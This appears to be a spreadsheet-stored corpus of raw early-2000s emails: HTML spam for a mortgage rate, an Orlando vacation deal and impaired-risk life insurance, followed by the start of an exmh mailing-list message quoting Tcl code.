       style="BORDER-RIGHT: #006600 12px double; PADDING-RIGHT: 4px; BORDER-TOP: #006600 12px double; PADDING-LEFT: 4px; PADDING-BOTTOM: 1px; BORDER-LEFT: #006600 12px double; PADDING-TOP: 1px; BORDER-BOTTOM: #006600 12px double; BORDER-COLLAPSE: collapse" 
       borderColor=#111111 height=338 cellSpacing=0 borderColorDark=#ffffff 
       cellPadding=0 width=539 borderColorLight=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=4 height=423&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD 
           style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
           vAlign=top align=left width=535 height=423&gt;
             &lt;TABLE style="BORDER-COLLAPSE: collapse" borderColor=#111111 
             cellSpacing=0 cellPadding=4 width="95%" bgColor=#ffffff border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top align=right height=424&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         color=#000000 size=2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                         color=#000000&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Dear 
                         Homeowner,&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=left&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif"&gt;*&lt;/FONT&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         color=#ff0000&gt;6.25% 30 Yr Fixed Rate 
                         Mortgage&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT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&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE style="POSITION: relative; BORDER-COLLAPSE: collapse" 
                   borderColor=#111111 height=1 cellSpacing=0 cellPadding=0 
                   width=504 border=0&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top width=325 height=1&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;BR&gt;&lt;/A&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html" 
                         target=new_win&gt;Click Here for a Free 
                         Quote!&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html" 
                         target=new_win&gt; &lt;/A&gt;&lt;/DIV&gt;
                         &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana,Arial,Helvetica,sans-serif 
                         size=2&gt;Lock In YOUR LOW FIXED RATE TODAY&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
                         &lt;DL&gt;
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;NO COST 
                           OUT OF POCKET&lt;/FONT&gt;&lt;/B&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;NO 
                           OBLIGATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;FREE 
                           CONSULTATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;ALL 
                           CREDIT GRADES ACCEPTED&lt;/B&gt;&lt;/FONT&gt; &lt;/DD&gt;&lt;/DL&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face=Verdana,Arial,Helvetica,sans-serif color=red 
                         size=2&gt;&lt;B&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html"&gt;Rates as 
                         low as 6.25% won't stay this low forever CLICK 
                         HERE&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;FONT size=2 PTSIZE="10"&gt;&lt;B&gt;&lt;FONT 
                         style="FONT-SIZE: 6pt" 
                         face=Verdana,Arial,Helvetica,sans-serif&gt;* based on 
                         mortgage rate as of 5-15-02 as low as 6.25% see lender 
                         for details&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD vAlign=top width=4 height=1&gt;
                         &lt;DIV align=right&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD borderColor=#006600 width=175 bgColor=#ffffff 
 height=1&gt;
                         &lt;H1&gt;&lt;SPAN style="VERTICAL-ALIGN: middle"&gt;&lt;FONT 
                         style="FONT-SIZE: 200px" face=Webdings color=#006600&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html"&gt;&lt;FONT 
                         color=#006600&gt;H&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/H1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=3 width=472 border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD colSpan=2 height=64&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;B&gt;
                         &lt;TABLE height=38 cellSpacing=2 cellPadding=0 width=482 
                         border=0&gt;
                           &lt;TBODY&gt;
                           &lt;TR&gt;
                             &lt;TD 
                             style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
                             width=327 height=36&gt;&lt;FONT 
                               face=Verdana,Arial,Helvetica,sans-serif 
                               size=2&gt;Apply now and one of our lending partners 
                               will get back to you within 48 
                               hours.&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT style="FONT-SIZE: 6pt" 
                               face=Verdana,Arial,Helvetica,sans-serif&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/FONT&gt;&lt;FONT 
                             face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;
                             &lt;TD style="BORDER-LEFT: 1px solid" width=141 
                             bgColor=#ff0000 height=36&gt;
                               &lt;P align=center&gt;&lt;B&gt;&lt;FONT color=#ffffff size=4&gt;&lt;A 
                               style="TEXT-DECORATION: none" 
                               href="http://www.status100.com/mortgage/index34.html"&gt;&lt;FONT 
                               color=#ffffff&gt;CLICK 
                             HERE!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;
               &lt;/TR&gt;
             &lt;/TABLE&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;complete name removing system at website.
 &lt;p&gt;
 &lt;/html&gt;
 371812976544333222
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $99 for 5 Nights in Magical Orlando with 2 Disney Tickets
</t>
  </si>
  <si>
    <t xml:space="preserve">This is an HTML email message.  If you see this, your mail client does not support HTML messages.
 ------=_NextPart_MABVCXIMXO
 Content-Type: text/html;charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-us"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;New Page 1&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="0" cellpadding="0" cellspacing="0" width="640" height="480"&gt;
     &lt;tr&gt;
       &lt;td width="638" valign="bottom" align="center" colspan="2" height="71"&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;u&gt;&lt;b&gt;&lt;font face="Bradley Hand ITC" color="#0000FF" size="4"&gt;&amp;quot;MAGICAL&amp;quot;
         ORLANDO / &amp;quot;FABULOUS&amp;quot; FT. LAUDERDALE&lt;/font&gt;&lt;/b&gt;&lt;/u&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;b&gt;&lt;font face="Bradley Hand ITC" size="2"&gt;EXPERIENCE
         ALL THE SPLENDOR AND MAGIC... THAT IS FLORIDA!!!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="278" align="center" height="99" valign="top"&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/front1.jpg" width="300" height="91"&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/front2.jpg" width="300" height="91"&gt;&lt;/p&gt;
       &lt;/td&gt;
       &lt;td width="347" align="center" height="179"&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;b&gt;&lt;font face="Bradley Hand ITC" color="#0000FF" size="4"&gt;&amp;nbsp;6
         DAYS / 5 NIGHTS&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;u&gt;&lt;font size="3" face="Bradley Hand ITC" color="#0000FF"&gt;&lt;b&gt;FIRST
         CLASS ACCOMMODATIONS&lt;/b&gt;&lt;/font&gt;&lt;/u&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font size="2" face="Bradley Hand ITC"&gt;3NIGHTS
         IN &amp;quot;MAGICAL&amp;quot; ORLANDO&lt;/font&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font size="2" face="Bradley Hand ITC"&gt;2
         NIGHTS IN &amp;quot;FABULOUS&amp;quot; FT. LAUDERDALE&lt;/font&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font size="2" face="Bradley Hand ITC"&gt;2
         PASSES TO DISNEY, EPCOT, OR UNIVERSAL&lt;/font&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 11; margin-bottom: 0"&gt;&lt;b&gt;&lt;font size="5" face="Bradley Hand ITC" color="#0000FF"&gt;ONLY
         &lt;/font&gt;&lt;font size="5" face="Bradley Hand ITC" color="#FF0000"&gt;
         $99.00&lt;/font&gt;&lt;font size="5" face="Bradley Hand ITC" color="#0000FF"&gt; PER PERSON&lt;/font&gt;&lt;/b&gt;&lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;b&gt;&lt;font face="Bradley Hand ITC" size="3"&gt;CONFIRMATION
         NUMBER: &lt;/font&gt;&lt;font size="3" face="Arial Black" color="#FF0000"&gt;1ST1LV&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="638" colspan="2" valign="middle" align="center" height="230"&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font face="Bradley Hand ITC" size="5"&gt;&lt;b&gt;CALL
         OUR TOLL FREE NUMBER TO RESERVE YOUR&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font face="Bradley Hand ITC" color="#FF0000" size="6"&gt;&lt;b&gt;&amp;quot;FABULOUS&amp;nbsp;
         FAMILY&amp;nbsp; GETAWAY&amp;quot;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font size="6" face="Bradley Hand ITC" color="#FF0000"&gt;&lt;b&gt;TOLL
         FREE... 1-866-345-7402&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;b&gt;&lt;i&gt;&lt;font face="Bradley Hand ITC" color="#FF0000" size="5"&gt;Please...
         one call per email notification&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;a href="http://www.famtriptravel.com/promooffers.html#99"&gt;&lt;font face="Arial"&gt;If
         you are too busy to call... please leave us your information by&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;a href="http://www.famtriptravel.com/promooffers.html#99"&gt;&lt;font face="Arial"&gt;clicking
         here and we will contact you at the time and number you specify&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font face="Bradley Hand ITC"&gt;&lt;b&gt;&lt;font size="5"&gt;BONUS...&lt;/font&gt;
         ORDER WITHIN 72 HOURS AND ALSO RECEIVE&lt;/b&gt; &lt;/font&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font face="Bradley Hand ITC"&gt;&lt;b&gt;4
         DAYS AND 3 NIGHTS FIRST CLASS ACCOMMODATIONS IN...&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font face="Bradley Hand ITC"&gt;LAS
         VEGAS, NV.&amp;nbsp; PUERTO VALLARTA, MEXICO&amp;nbsp; WILLIAMSBURG, VA.&lt;/font&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&amp;nbsp;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="0" cellpadding="0" cellspacing="0" width="640"&gt;
     &lt;tr&gt;
       &lt;td width="100%" valign="middle" align="center"&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;u&gt;&lt;a href="http://www.rprpromos.com/adv/termsandcon.htm" target="_blank"&gt;TERMS
         AND CONDITIONS OF PROMOTION&lt;/a&gt;&lt;/u&gt;&lt;/p&gt;
         &lt;p style="word-spacing: 0; margin-top: 0; margin-bottom: 0"&gt;&lt;font size="2"&gt;TO
         BE REMOVED&amp;nbsp; &lt;a href="mailto:removeme@famtriptravel.com &amp;subject=remove me"&gt;CLICK HERE&lt;/a&gt; OR EMAIL &amp;quot;&lt;a href="mailto:removeme@famtriptravel.com"&gt;removeme@famtriptravel.com&lt;/a&gt;&amp;quot;
         with the subject &amp;quot;REMOVE ME&amp;quot;.&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="100%" valign="middle" align="center"&gt;
         &lt;img border="0" src="http://www.famtriptravel.com/images/imperial.jpg" width="274" height="75"&gt;&amp;nbsp;&amp;nbsp;
         &lt;img border="0" src="http://www.famtriptravel.com/images/universal_studios_logo.gif" width="130" height="68"&gt;&amp;nbsp;&amp;nbsp;
         &lt;img border="0" src="http://www.famtriptravel.com/images/clia.gif" width="74" height="84"&gt;&amp;nbsp;&amp;nbsp;
         &lt;img border="0" src="http://www.famtriptravel.com/images/amerihost.gif" width="70" height="56"&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_MABVCXIMXO--
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_3658CA_01C24ABF.723FADA0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Diversified Underwriters Services, Inc.
  Impaired Risk Case of the Month July 2002
 	? Male 58 Non-smoker
 	? Face Amount $3,000,000
 	? 5'11" 255 lbs.
 	? Crohn's Disease for 30 Years
 	? 5 Major Intestinal Surgeries
 	? Steroid Therapy for 30 Years
 	? 1997 Diabetes
 	? 1998 Hypertension=20
  Diversified's Answer...
  Standard!
 Broker's Commission: $60,598 !!
  =09
 Let Us Turn Your Clients That Have Been Declined, Rated or Have Current
 Health Problems, Into Placeable Life Cases!
   =09
  "INST-A-QUOTE"(tm) for Impaired Risk Life Quotes
  Call Now for an "Inst-A-Quote"=99 on your client and we will get back =
 to
 you within 24 hours! 800-683-3077 ext. 0=97 or =97
 Please fill out the form below for more information	=20
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
  &lt;http://www.d-u-s.com&gt; 	=20
 For Broker Use Only. Not for Public Dissemination.	=20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.InsuranceIQ.com/optout
 &lt;http://www.InsuranceIQ.com/optout&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_3658CA_01C24ABF.723FADA0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Impaired Risk Case of the Month&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Dwindows-1252"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;img src=3D"http://iiq.us/Images/dus/0801/20020731-101.gif" =
 alt=3D"Diversified Underwriters Services, Inc." width=3D"550" =
 height=3D"77"&gt;&lt;br&gt;=20
       &lt;img src=3D"http://iiq.us/Images/dus/0801/20020731-102.gif" =
 alt=3D"Impaired Risk Case of the Month" width=3D"275" height=3D"91"&gt;&lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-103.jpg" alt=3D"July 2002" =
 width=3D"275" height=3D"91"&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td valign=3D"top"&gt;&lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"2" cellpadding=3D"2"&gt;
             &lt;table&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;
                   &lt;blockquote&gt;=20
                   &lt;p&gt;&lt;font size=3D"4"&gt;&lt;b&gt;
                     &amp;#149;&amp;nbsp;Male 58 Non-smoker&lt;br&gt;
                     &amp;#149;&amp;nbsp;Face Amount $3,000,000&lt;br&gt;
                     &amp;#149;&amp;nbsp;5'11&amp;quot; 255 lbs.&lt;br&gt;
                     &amp;#149;&amp;nbsp;Crohn's Disease for 30 Years&lt;br&gt;
                     &amp;#149;&amp;nbsp;5 Major Intestinal Surgeries&lt;br&gt;
                     &amp;#149;&amp;nbsp;Steroid Therapy for 30 Years&lt;br&gt;
                     &amp;#149;&amp;nbsp;1997 Diabetes&lt;br&gt;
                     &amp;#149;&amp;nbsp;1998 Hypertension &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                   &lt;/blockquote&gt;
                   &lt;p align=3D"center"&gt;&lt;font size=3D"4"&gt;&lt;img =
 src=3D"http://www.d-u-s.com/e_mail_files/images/diversified_answer2.gif" =
 width=3D298 height=3D40 alt=3D"Diversified's Answer..."&gt;&lt;br&gt;
                     &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-202.gif" alt=3D"Standard!" =
 width=3D"298" height=3D"38"&gt;&lt;br&gt;&lt;br&gt;
                     &lt;i&gt;&lt;b&gt;Broker's Commission: $60,598 =
 !!&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;br&gt;&lt;/p&gt;
                 &lt;/td&gt;
                 &lt;td align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-3.jpg" width=3D"169" =
 height=3D"250"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;b&gt;&lt;font color=3D"#000000"&gt;Let Us Turn Your Clients=20
             That Have Been &lt;font color=3D"#0000FF"&gt;Declined, =
 Rated&lt;/font&gt; or Have=20
             Current &lt;font color=3D"#0000FF"&gt;Health Problems&lt;/font&gt;, Into =
 &lt;font color=3D"#0000FF"&gt;Placeable=20
             Life Cases!&lt;/font&gt;&lt;br&gt;
             &amp;nbsp; &lt;/font&gt;&lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/Images/dus/0801/instaquote01.gif" =
 alt=3D"&amp;quot;INST-A-QUOTE&amp;quot;(tm)  for Impaired Risk Life Quotes" =
 width=3D"408" height=3D"75"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/Images/dus/0801/20020731-7.gif" =
 width=3D"321" height=3D"45" alt=3D"Call Now for an =
 &amp;quot;Inst-A-Quote&amp;quot;&amp;#8482; on your  client and we will get back to =
 you within 24 hours!"&gt;=20
             &lt;img src=3D"http://iiq.us/Images/dus/0801/20020731-5.gif" =
 alt=3D"800-683-3077 ext. 0" width=3D"540" height=3D"94"&gt;=20
             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;&amp;#8212; or &amp;#8212;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#003300"&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Please fill =
 out the form below for more information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;font size=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"rblanco@d-u-s.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"DUS Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;&lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;a href=3D"http://www.d-u-s.com"&gt;&lt;img =
 src=3D"http://iiq.us/images/dus/0801/20020731-6.gif" width=3D"485" =
 height=3D"40" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font size=3D"1"&gt;For Broker Use Only. Not for Public =
 Dissemination.&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt; &lt;p&gt;&lt;font =
 size=3D"1"&gt; We don't=20
         want anyone to receive our mailings who does not wish to. This =
 is professional=20
         communication sent to insurance professionals. To be removed =
 from this=20
         mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go =
 here: &lt;a href=3D"http://www.InsuranceIQ.com/optout"&gt;=20
         http://www.InsuranceIQ.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal=20
   Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_3658CA_01C24ABF.723FADA0--
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_893671157P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; Date:  Wed, 28 Aug 2002 21:44:26 +0700
 &gt;
 &gt;     Date:        Wed, 28 Aug 2002 09:22:34 -0500
 &gt;     From:        Chris Garrigues &lt;cwg-dated-1030976555.34ad5b@DeepEddy.Com&gt;
 &gt;     Message-ID:  &lt;1030544555.28815.TMDA@deepeddy.vircio.com&gt;
 &gt; 
 &gt; 
 &gt;   | so I'll probably poke around at the sequences performance issues,
 &gt; 
 &gt; Well, there's this wonderful piece of code in MhSeqExpand ...
 &gt; 
 &gt;     # Hack to weed out sequence numbers for messages that don't exist
 &gt;     foreach m $rseq {
 &gt;         if ![file exists $mhProfile(path)/$folder/$m] {
 &gt;             Exmh_Debug $mhProfile(path)/$folder/$m not found
 &gt;             set ix [lsearch $seq $m]
